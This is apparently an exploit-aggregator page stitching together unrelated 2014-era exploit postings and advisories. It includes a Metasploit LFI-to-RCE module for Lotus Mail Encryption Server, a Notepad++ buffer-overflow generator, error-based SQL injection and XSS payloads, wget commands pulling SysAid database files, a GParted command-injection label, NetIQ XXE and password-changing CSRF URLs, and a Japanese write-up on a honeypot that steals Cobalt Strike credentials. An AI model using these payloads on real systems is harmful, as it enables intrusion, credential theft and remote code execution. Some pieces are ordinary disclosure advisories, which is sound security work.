HireHackking

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= INDEPENDENT SECURITY RESEARCHER PENETRATION TESTING SECURITY -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # Exploit Title: GQ File Manager - Sql Injection - Cross Site Scripting Vulnerability's # Date: 19/12/2014 # Url Vendor: http://installatron.com/phpfilemanager # Vendor Name: GQ File Manager # Version: 0.2.5 # CVE: CVE-2014-1137 # Author: TaurusOmar # Tiwtter: @TaurusOmar_ # Email: taurusomar13@gmail.com # Home: overhat.blogspot.com # Tested On: Bugtraq Optimus # Risk: High Description GQ File Manager is a lightweight file manager that enables files to be uploaded to and downloaded from a server directory. GQ File Manager is great for creating and maintaining a simple cloud-based repository of files that can be accessed from anywhere on the Internet. ------------------------ + CROSS SITE SCRIPTING + ------------------------ # Exploiting Description - Created new file example:("xss.html")in the document insert code xss Input: "><img src=x onerror=;;alert('XSS') /> Output: <br /> <b>Warning</b>: fread() [<a href='function.fread'>function.fread</a>]: Length parameter must be greater than 0 in <b>/home/u138790842/public_html/gp/incl/edit.inc.php</b> on line <b>44</b><br /> "><img src=x onerror=alert("xss");> #P0c "><img src=x onerror=;;alert('XSS') /> #Proof Concept http://i.imgur.com/cjIvR5l.jpg ------------------------ + Sql Injection + ------------------------ # Exploiting Description - The Sql Injection in path created a new file. #P0c http://site.com/GQFileManager/index.php?&&output=create&create=[sql] #Proof Concept http://i.imgur.com/IJZoDVt.jpg

MySQLハニーポットの特定の技術的詳細については、インターネット上にあまりにも多くの記事があります。自分でオンラインで記事を検索できます。紹介を書きます：MySQLには、MySQLデータベースにローカルファイルを読み取ることができるロードデータローカルインフィル機能があります。攻撃者がMySQLパスワードを爆発させてMySQLにスキャンして接続するスキャナーを使用しています（ここで修正します。MySQLハニーポットに接続するだけで、ハニーポットでローカル構成ファイルを読み取ることができます。正しいユーザー名とパスワードを提供する必要はありません）、クライアント（攻撃者）応答パケットにローカルインフィルのロードデータを追加して、攻撃者のローカルファイルをデータベースに読み取り、対策の目的を達成します。 （次の写真はインターネット検索からのものです） CSの構成ファイルプレーンテキストストレージパスワード CSSクライアントを使用してCSSサーバーを使用したコンピューターに接続する限り、CSSクライアントは固定フォルダーで.aggressor.prop構成ファイルを生成します。 Windowsシステムの場合、ファイルの場所はc: \ uses \ administrator \ .aggressor.propです。この構成ファイルには、CSSリモートコントロールのIPアドレス、ポート、ユーザー名、パスワードが含まれており、すべてプレーンテキストにあります！下の図に示すように： CSを開くたびに、ログインしたIPアドレス、ポート、ユーザー名、パスワード、その他の情報が表示されます。これらの情報は、local .aggressor.propファイルに保存されます。一般的なコンテンツを以下の図に示します。 したがって、MySQLハニーポットを構築したという結論に達しました。攻撃者がハニーポットに接続すると、HoneypotはMSYQLローカルファイルの読み取り脆弱性を使用して、C: \ uses \ administrator \ .aggressor.propファイルのコンテンツを自動的に読み取ります。 Honeypotは、攻撃者のCCSサーバーIPアドレス、ポート、ユーザー名、パスワードを正常に取得できます。 環境実験を正常に構築しました 上記の推測を検証するために、実際にテストする必要があります。 githubからpythonで書かれたmysqlハニーポットスクリプトを見つけて、単にローカルに変更するだけで、ファイル読み取りのパスをC: \ uses \ administrator \ .aggressor.propに変更し、スクリプトを実行します。以下の図に示すように、ローカルポート3306を聴くMySQLハニーポットが構築されています。 MySQLに接続する赤チーム担当者の動作をシミュレートするために、NAVICATを使用して、このハニーポットのIPアドレスをリモートで接続します。 （もう一度強調するために、MySQLのユーザー名とパスワードを知る必要はありません。間違ったユーザー名とパスワードを入力します。MySQLHoneypotもローカルファイルを読むことができます） 下の図に示すように、MySQLハニーポットは、現在のディレクトリのログファイルにBase64暗号化されたCS構成ファイルのコンテンツを提供します。 Base64が復号化された後の結果は次のとおりです。 ・ 取得したIPアドレス、ポート、ユーザー名、およびパスワードはCSSサーバーに接続されていました（次の写真はインターネットからのものです） Windowsの下では、WeChatのデフォルトの構成ファイルはc: \ uses \ username \ documents \ wechatファイルに配置されます。それを調べると、c: \ uses \ username \ documents \ wechat files \ alues \ config \ config.dataが含まれていることがわかります。

## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::PHPInclude def initialize(info = {}) super(update_info(info, 'Name' => 'Lotus Mail Encryption Server (Protector for Mail) Local File Inclusion', 'Description' => %q{ This module exploits a local file inclusion vulnerability in the Lotus Mail Encryption Server (Protector for Mail Encryption) administration setup interface. The index.php file uses an unsafe include() where an unauthenticated remote user may read (traversal) arbitrary file contents. By abusing a second bug within Lotus, we can inject our payload into a known location and call it via the LFI to gain remote code execution. Version 2.1.0.1 Build(88.3.0.1.4323) is known to be vulnerable. You may need to set DATE in the format YYYY-MM-DD to get this working, where the remote host and metasploit instance have UTC timezone differences. }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'http://www.osisecurity.com.au/advisories/' ], #0day #[ 'CVE', 'X' ], [ 'OSVDB', '87556'], #[ 'BID', 'X' ], ], 'Privileged' => false, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [[ 'Lotus Mail Encryption Server 2.1.0.1', { }]], 'DisclosureDate' => 'Nov 9 2012', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(9000), OptBool.new('SSL', [true, 'Use SSL', true]), OptString.new("DATE", [false, 'The date of the target system log file in YYYY-MM-DD format']), ], self.class) end def check res = send_request_cgi( { 'uri' => '/' }) if (res.code == 302 && res.body.match(/GetLoginScreen.uevent/)) return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end def php_exploit logfile = datastore['DATE'] ? datastore['DATE'] : Time.now.strftime("%Y-%m-%d") if (logfile !~ /\d\d\d\d-\d\d-\d\d/) # if set by user datastore... print_error("DATE is in incorrect format (use 'YYYY-MM-DD'). Unable to continue.") return end # set up the initial log file RCE - this is unescaped ascii so we can execute it # later >:) uid is tomcat so we cannot read apache's logs, and we are stuck inside # tomcat's php-cgi wrapper which prevents /proc/* injection and a lot of the # filesystem. example good injected log: '/var/log/ovid/omf-2012-08-01.log' patrick inject_url = "/omc/GetSetupScreen.event?setupPage=<?php+include+'#{php_include_url}';+?>" # no whitespace res = send_request_cgi( { 'uri' => inject_url }) if (res and res.code == 404 and res.body.match(/Lotus Protector for Mail Encryption - Page Not Found/)) # it returns a 404 but this is good. vprint_good("Payload injected...") response = send_request_cgi( { 'uri' => '/omc/pme/index.php', 'cookie' => "slaLANG=../../../../../../var/log/ovid/omf-#{logfile}.log%00;", # discard .php }) end end end

#!/usr/bin/python # Exploit Title: NotePad++ v6.6.9 Buffer Overflow # URL Vendor: http://notepad-plus-plus.org/ # Vendor Name: NotePad # Version: 6.6.9 # Date: 22/12/2014 # CVE: CVE-2014-1004 # Author: TaurusOmar # Twitter: @TaurusOmar_ # Email: taurusomar13@gmail.com # Home: overhat.blogspot.com # Risk: Medium #Description: #Notepad++ is a free (as in "free speech" and also as in "free beer") source code editor and Notepad replacement that supports several languages. #Running in the MS Windows environment, its use is governed by GPL License. #Based on the powerful editing component Scintilla, Notepad++ is written in C++ and uses pure Win32 API and STL which ensures a higher execution speed #and smaller program size. By optimizing as many routines as possible without losing user friendliness, Notepad++ is trying to reduce the world carbon #dioxide emissions. When using less CPU power, the PC can throttle down and reduce power consumption, resulting in a greener environment. #Proof Concept #http://i.imgur.com/TTDtxJM.jpg #Code import struct def little_endian(address): return struct.pack("<L",address) poc ="\x41" * 591 poc+="\xeb\x06\x90\x90" poc+=little_endian(0x1004C31F) poc+="\x90" * 80 poc+="\x90" * (20000 - len(poc)) header = "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22" header += "\x55\x54\x46\x2d\x38\x22\x20\x3f\x3e\x0a\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x3e\x0a\x09\x3c\x45\x76\x65\x6e\x74\x20\x55" header += "\x72\x6c\x3d\x22\x22\x20\x54\x69\x6d\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x0a" + poc footer = "\x22\x20\x46\x6f\x6c\x64\x65\x72\x3d\x22\x22\x20\x2f\x3e\x0a\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x3e\x0a" exploit = header + footer filename = "notepad.xml" file = open(filename , "w") file.write(exploit) file.close()

 BitRaider Streaming Client 1.3.3.4098 Local Privilege Escalation Vulnerability Vendor: BitRaider, LLC Product web page: http://www.bitraider.com Affected version: 1.3.3.4098 Summary: BitRaider is a video game streaming and download service. Desc: BitRaider contains a flaw that leads to unauthorized privileges being gained. The issue is due to the program granting improper permissions with the 'F' flag for the 'Users' group, which makes the entire 'BitRaider' directory and its sub directories and files world-writable. This may allow a local attacker to change an executable file with a binary file and gain elevated privileges. List of executables affected: o====================================================================================================o | Binary/location | Description | | | | |=============================================================== ====================================| | C:\ProgramData\BitRaider\BRSptStub.exe | BitRaider Support Stub | |---------------------------------------------------------------|------------------------------------| | C:\ProgramData\BitRaider\common\BRException.exe | BitRaider Exception Handler | |---------------------------------------------------------------|------------------------------------| | C:\ProgramData\BitRaider\common\brwc.exe | BitRaider Distribution Web Client | |---------------------------------------------------------------|------------------------------------| | C:\ProgramData\BitRaider\support\1.3.3\E02B25FC\BRSptSvc.exe | BitRaider Support Service Core | o====================================================================================================o Tested on: Microsoft Windows 7 Professional SP1 (EN) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2014-5217 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5217.php 17.12.2014 ---- C:\Users\user>sc qc BRSptStub [SC] QueryServiceConfig SUCCESS SERVICE_NAME: BRSptStub TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : "C:\ProgramData\BitRaider\BRSptStub.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : BitRaider Mini-Support Service Stub Loader DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\user>icacls "C:\ProgramData\BitRaider\BRSptStub.exe" C:\ProgramData\BitRaider\BRSptStub.exe BUILTIN\Users:(F) <-------------------------- NT AUTHORITY\SYSTEM:(F) NT AUTHORITY\Authenticated Users:(F) <------- BUILTIN\Administrators:(F) NT AUTHORITY\INTERACTIVE:(F) <--------------- NT AUTHORITY\SERVICE:(F) BUILTIN\Guests:(RX) BUILTIN\Users:(I)(F) <----------------------- NT AUTHORITY\SYSTEM:(I)(F) NT AUTHORITY\Authenticated Users:(I)(F) <---- BUILTIN\Administrators:(I)(F) NT AUTHORITY\INTERACTIVE:(I)(F) <------------ NT AUTHORITY\SERVICE:(I)(F) BUILTIN\Guests:(I)(RX) Successfully processed 1 files; Failed processing 0 files C:\Users\user>

################################################################################################## #Exploit Title : phpMyRecipes 1.2.2 SQL injection(page browse.php, parameter category) #Author : Manish Kishan Tanwar #Download Link : http://prdownloads.sourceforge.net/php-myrecipes/phpMyRecipes-1.2.2.tar.gz?download #Date : 23/12/2014 #Discovered at : IndiShell Lab # Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,jagriti # email : manish.1046@gmail.com ################################################################################################## //////////////////////// /// Overview: //////////////////////// phpMyRecipes is a simple application for storing and retrieving recipes. It uses a web-based interface, for ease of use across any system, and a MySQL database backend for storing the recipes. /////////////////////////////// // Vulnerability Description: /////////////////////////////// vulnerability is due to parameter category in browse.php parameter category is passing to function GetCategoryNameByID without data filtering and due to it, SQL injection vulnerability is arising. from line 38 to 56 $category = $_GET['category']; } $session = getsession(); c_header("Browse Recipes", "browse"); # Build a category string $cat = $category; $catstr = ""; while ($cat != 1) { if ($catstr == "") { $catstr = "<A HREF=\"" . slink("browse.php?category=$cat") . "\">" . GetCategoryNameByID($cat) . "</A>" . $catstr; } else { $catstr = "<A HREF=\"" . slink("browse.php?category=$cat") . "\">" . GetCategoryNameByID($cat) . "</A> > " . $catstr; } $cat = GetCategoryParentByID($cat); } //////////////// /// POC //// /////////////// POC image=http://oi57.tinypic.com/inv3ol.jpg payload for extracting database name set value of category parameter to 1 and add error based SQL injection payload to url http://127.0.0.1/pr/browse.php?category=1 and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) --==[[ Greetz To ]]==-- ############################################################################################ #Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba, #Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad, #Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA, #Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Das ############################################################################################# --==[[Love to]]==-- # My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi, #Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Don(Deepika kaushik) --==[[ Special Fuck goes to ]]==-- <3 suriya Cyber Tyson <3

# Exploit Title : jetAudio 8.1.3 Basic (Corrupted mp3) Crash POC # Product : jetAudio Basic # Date : 8.12.2014 # Exploit Author : ITDefensor Vulnerability Research Team http://itdefensor.ru/ # Software Link : http://www.jetaudio.com/download/ # Vulnerable version : 8.1.3 (Latest at the moment) and probably previous versions # Vendor Homepage : http://www.jetaudio.com/ # Tested on : jetAudio 8.1.3 Basic installed on Windows 7 x64, Windows Server 2008, Windows 7 x86 # CVE : unknown at the moment #============================================================================================ # Open created POC file (fault.mp3) with jetAudio # Details # (1e764.1df98): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # jdl_id3lib!dami::io::BStringWriter::writeChars+0xbf9: # 0aa6b8b9 8b4804 mov ecx,dword ptr [eax+4] ds:002b:00000004=???????? # 0:000:x86> kb # ChildEBP RetAddr Args to Child # WARNING: Stack unwind information not available. Following frames may be wrong. # 00000000 00000000 00000000 00000000 00000000 jdl_id3lib!dami::io::BStringWriter::writeChars+0xbf9 #============================================================================================ #!/usr/bin/python pocdata=("\x49\x44\x33\x00\x00\xC9\x00\x00\x00\x00\x41\x45\x4E\x43\x00\x00\x00\x00\x00\x00\x41\x45\x4E\x43\x00\x00\x00\x00\x00\x00\x41\x45\x4E\x43\x00\x00\x00\x00\x00\x00\x41\x45\x4E\x43\x00\x00\x00\x00\x00\x00\x41\x45\x4E\x43\x00\x00\x00\x00\x00\x00\xFF\x8E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x41\x47\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00") mp3file = "fault.mp3" file = open(mp3file , "w") file.write(pocdata) file.close()

Vantage Point Security Advisory 2014-004 ======================================== Title: SysAid Server Arbitrary File Disclosure ID: VP-2014-004 Vendor: SysAid Affected Product: SysAid On-Premise Affected Versions: < 14.4.2 Product Website: http://www.sysaid.com/product/sysaid Author: Bernhard Mueller <bernhard[at]vantagepoint[dot]sg> Summary: --- SysAid Server is vulnerable to an unauthenticated file disclosure attack that allows an anonymous attacker to read arbitrary files on the system. An attacker exploiting this issue can compromise SysAid user accounts and gain access to important system files. When SysAid is configured to use LDAP authentication it is possible to gain read access to the entire Active Directory or obtain domain admin privileges. Details: --- How to download SysAid server database files containing usernames and password hashes (use any unauthenticated session ID): wget -O "ilient.mdf" --header="Cookie: JSESSIONID=1C712103AA8E9A3D3F1D834E0063A089" \ "http://sysaid.example.com/getRdsLogFile?fileName=c:\\\\Program+Files\\\\SysAidMsSQL\\\\MSSQL10_50.SYSAIDMSSQL\\\\MSSQL\\DATA\\\\ilient.mdf" wget -O "ilient.ldf" --header="Cookie: JSESSIONID=1C712103AA8E9A3D3F1D834E0063A089" \ "http://sysaid.example.com/getRdsLogFile?fileName=c:\\\\Program+Files\\\\SysAidMsSQL\\\\MSSQL10_50.SYSAIDMSSQL\\\\MSSQL\\DATA\\\\ilient_log.LDF" The dowloaded MSSQL files contain the LDAP user account and encrypted password used to access the Active Directory (SysAid encrypts the password with a static key that is the same for all instances of the software). Fix Information: --- Upgrade to version 14.4.2. Timeline: --- 2014/11/14: Issue reported 2014/12/22: Patch available and installed by client About Vantage Point Security: --- Vantage Point Security is the leading provider for penetration testing and security advisory services in Singapore. Clients in the Financial, Banking and Telecommunications industries select Vantage Point Security based on technical competency and a proven track record to deliver significant and measurable improvements in their security posture. Web: https://www.vantagepoint.sg/ Contact: office[at]vantagepoint[dot]sg

SEC Consult Vulnerability Lab Security Advisory < 20141218-1 > ======================================================================= title: OS Command Execution product: GParted - Gnome Partition Editor vulnerable version: <=0.14.1 fixed version: >=0.15.0, <=0.14.1 with fix for CVE-2014-7208 applied CVE number: CVE-2014-7208 impact: medium homepage: http://gparted.org/ found: 2014-07 by: W. Ettlinger SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "GParted is a free partition editor for graphically managing your disk partitions. With GParted you can resize, copy, and move partitions without data loss, enabling you to: * Grow or shrink your C: drive * Create space for new operating systems * Attempt data rescue from lost partitions" URL: http://gparted.org/index.php Vulnerability overview/description: ----------------------------------- Gparted <=0.14.1 does not properly sanitize strings before passing them as parameters to an OS command. Those commands are executed using root privileges. Parameters that are being used for OS commands in Gparted are normally determined by the user (e.g. disk labels, mount points). However, under certain circumstances, an attacker can use an external storage device to inject command parameters. These circumstances are met if for example an automounter uses a filesystem label as part of the mount path. Please note that GParted versions before 0.15 are still being used in distributions. E.g Debian Wheezy is vulnerable to this issue before applying the patches. Proof of concept: ----------------- The following command creates a malicious filesystem. # mkfs.ext2 -L "\`reboot\`" /dev/sdXX When this filesystem is mounted by an automounter to a mountpoint containing the filesystem label and the user tries to unmount this filesystem using GParted, the system reboots. Vulnerable / tested versions: ----------------------------- Gparted versions <=0.14.1 were found to be vulnerable. Vendor contact timeline: ------------------------ 2014-10-29: Contacting maintainer (Curtis Gedak) through gedakc AT users DOT sf DOT net 2014-10-29: Initial response from maintainer offering encryption 2014-10-30: Sending encrypted advisory 2014-10-30: Maintainer confirms the behaviour, will be investigated further 2014-11-04: Maintainer sends initial patches 2014-11-05: Giving a few notes on the patches 2014-11-05: Maintainer clarifies a few concerns with the patches; Forwards patches to Mike Fleetwood for review 2014-11-08: Review shows that the patches cause functional problems; proposes further procedure 2014-11-08: Maintainer proposes a different patching approach 2014-11-08: Reviewer shows concerns with this approach, opens a security bug (1171909) with Fedora (in accordance with their Security Tracking Bugs procedure); Red Hat creates tracking bug 1172549 2014-11-15: New patches for several versions 2014-11-23: Maintainer sends vulnerability information to Debian 2014-11-29: Debian Security Team responds, asks for embargo date and CVE number 2014-11-30: Release date set to 2014-12-18 2014-12-11: Mailing list linux-distros AT vs DOT openwall DOT org informed 2014-12-11: Writing that embargo may be lifted, SEC Consult will release advisory on 2014-12-18 2014-12-18: Coordinated release of security advisory Solution: --------- Update GParted to version >= 0.15.0 or apply security patches for CVE-2014-7208. Advisory URL: ------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich Headquarter: Mooslackengasse 17, 1190 Vienna, Austria Phone: +43 1 8903043 0 Fax: +43 1 8903043 15 Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult Interested to work with the experts of SEC Consult? Write to career@sec-consult.com EOF W. Ettlinger / @2014

SEC Consult Vulnerability Lab Security Advisory < 20141218-2 > ======================================================================= title: Multiple high risk vulnerabilities product: NetIQ Access Manager vulnerable version: 4.0 SP1 fixed version: 4.0 SP1 Hot Fix 3 CVE number: CVE-2014-5214, CVE-2014-5215, CVE-2014-5216, CVE-2014-5217 impact: High homepage: https://www.netiq.com/ found: 2014-10-29 by: W. Ettlinger SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor/product description: --------------------------- "As demands for secure web access expand and delivery becomes increasingly complex, organizations face some formidable challenges. Access Manager provides a simple yet secure and scalable solution that can handle all your web access needs—both internal as well as in the cloud." URL: https://www.netiq.com/products/access-manager/ Business recommendation: ------------------------ An attacker without an account on the NetIQ Access Manager is be able to gain administrative access by combining different attack vectors. Though this host may not always be accessible from a public network, an attacker is still able to compromise the system when directly targeting administrative users. Because the NetIQ Access Manager is used for authentication, an attacker compromising the system can use it to gain access to other systems. SEC Consult highly recommends that this software is not used until a full security review has been performed and all issues have been resolved. Vulnerability overview/description: ----------------------------------- 1) XML eXternal Entity Injection (XXE, CVE-2014-5214) Authenticated administrative users can download arbitrary files from the Access Manager administration interface as the user "novlwww". The vendor provided the following KB link: https://www.novell.com/support/kb/doc.php?id=7015993 2) Reflected Cross Site Scripting (XSS, CVE-2014-5216) Multiple reflected cross site scripting vulnerabilities were found. These allow effective attacks of administrative and SSLVPN sessions. The vendor provided the following KB link: https://www.novell.com/support/kb/doc.php?id=7015994 3) Persistent Site Scripting (XSS, CVE-2014-5216) A persistent cross site scripting vulnerability was found. This allows effective attacks of administrative and SSLVPN sessions. The vendor provided the following KB link: https://www.novell.com/support/kb/doc.php?id=7015996 4) Cross Site Request Forgery (CVE-2014-5217) The Access Manager administration interface does not have CSRF protection. The vendor provided the following KB link: https://www.novell.com/support/kb/doc.php?id=7015997 5) Information Disclosure (CVE-2014-5215) Authenticated users of the administration interface can gain authentication information of internal administrative users. The vendor provided the following KB link: https://www.novell.com/support/kb/doc.php?id=7015995 By combining all of the above vulnerabilities (CSRF, XSS, XXE) an unauthenticated, non-admin user may gain full access to the system! Proof of concept: ----------------- 1) XML eXternal Entity Injection (XXE) As an example, the following URL demonstrates the retrieval of the /etc/passwd file as an authenticated administrative user: https://<host>:8443/nps/servlet/webacc?taskId=fw.PreviewObjectFilter&nextState=initialState&merge=fw.TCPreviewFilter&query=<!DOCTYPE+request+[%0a<!ENTITY+include+SYSTEM+"/etc/passwd">%0a]><query><container>%26include%3b</container><subclasses>false</subclasses></query> 2) Reflected Cross Site Scripting (XSS) The following URLs demonstrate different reflected XSS flaws in the administration interface and the user interface. https://<host>:8443/nps/servlet/webacc?taskId=dev.Empty&merge=dm.GenericTask&location=/roma/jsp/admin/view/main.jss'%2balert+('xss')%2b' https://<host>:8443/roma/jsp/debug/debug.jsp?xss=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E https://<host>:8443//nps/servlet/webacc?taskId=debug.DumpAll&xss=%3Cimg%20src=%22/404%22%20onerror=%22alert+%28%27xss%27%29%22%3E https://<host>/nidp/jsp/x509err.jsp?error=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E https://<host>/sslvpn/applet_agent.jsp?lang=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E 3) Persistent Site Scripting (XSS) The following URL injects a stored script on the auditing page: https://<host>:8443/roma/system/cntl?handler=dispatcher&command=auditsave&&secureLoggingServersA='){}};alert('xss');function+x(){if('&port=1289 4) Cross Site Request Forgery As an example, an attacker is able to change the administration password to '12345' by issuing a GET request in the context of an authenticated administrator. The old password is not necessary for this attack! https://<host>:8443/nps/servlet/webacc?taskId=fw.SetPassword&nextState=doSetPassword&merge=dev.GenConf&selectedObject=P%3Aadmin.novellP&single=admin.novell&SetPswdNewPassword=12345&SetPswdVerifyPassword=12345 5) Information Disclosure The following URLs disclose several useful information to an authenticated account: https://<host>:8443/roma/jsp/volsc/monitoring/dev_services.jsp https://<host>:8443/roma/jsp/debug/debug.jsp The disclosed system properties: com.volera.vcdn.monitor.password com.volera.vcdn.alert.password com.volera.vcdn.sync.password com.volera.vcdn.scheduler.password com.volera.vcdn.publisher.password com.volera.vcdn.application.sc.scheduler.password com.volera.vcdn.health.password The static string "k~jd)*L2;93=Gjs" is XORed with these values in order to decrypt passwords of internally used service accounts. By combining all of the above vulnerabilities (CSRF, XSS, XXE) an unauthenticated, non-admin user may gain full access to the system! Vulnerable / tested versions: ----------------------------- The vulnerabilities have been verified to exist in the NetIQ Access Manager version 4.0 SP1, which was the most recent version at the time of discovery. Vendor contact timeline: ------------------------ 2014-10-29: Contacting security@netiq.com, sending responsible disclosure policy and PGP keys 2014-10-29: Vendor redirects to security@novell.com, providing PGP keys through Novell support page 2014-10-30: Sending encrypted security advisory to Novell 2014-10-30: Novell acknowledges the receipt of the advisory 2014-12-16: Novell: the vulnerability fixes will be released tomorrow; The CSRF vulnerability will not be fixed immediately ("Since this can be done only after an authorized login"); two XSS vulnerabilities can not be exploited ("We could not take advantage or retrieve any cookie info on the server side - it looks like it's a client side cross scripting attack.") 2014-12-16: Explaining why those vulnerabilities can be exploited 2014-12-17: Novell: Fix will be released tomorrow 2014-12-17: Verifying release of advisory tomorrow 2014-12-18: Novell: Advisory can be released 2014-12-18: Coordinated release of security advisory Solution: --------- Update to the latest available of Access Manager and implement workarounds mentioned in the KB articles by Novell linked above. Workaround: ----------- For some vulnerabilities, Novell provides best practice recommendations in the URLs linked above. Advisory URL: ------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich Headquarter: Mooslackengasse 17, 1190 Vienna, Austria Phone: +43 1 8903043 0 Fax: +43 1 8903043 15 Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult Interested to work with the experts of SEC Consult? Write to career@sec-consult.com EOF W. Ettlinger / @2014

source: https://www.securityfocus.com/bid/47273/info eGroupware is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. eGroupware 1.8.001 is vulnerable; other versions may also be affected. http://www.example.com/egroupware/phpgwapi/js/jscalendar/test.php?lang=%22%3E%3C/script%3E%3Cscript%3Ealert%280%29%3C/script%3E

source: https://www.securityfocus.com/bid/47277/info Fiberhome HG-110 is prone to a cross-site scripting vulnerability and a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting these issues will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to view arbitrary local files and directories within the context of the webserver. This may let the attacker steal cookie-based authentication credentials and other harvested information, which may aid in launching further attacks. Fiberhome HG-110 firmware 1.0.0 is vulnerable other versions may also be affected. The following example URIs are available: http://www.example.com/cgi-bin/webproc?getpage=%3Cscript%3Ealert%28this%29%3C/script%3E&var:menu=advanced&var:page=dns Local File Include and Directory/Path Traversal: - http://www.example.com/cgi-bin/webproc?getpage=../../../../../../../../../../../../etc/passwd&var:menu=advanced&var:page=dns

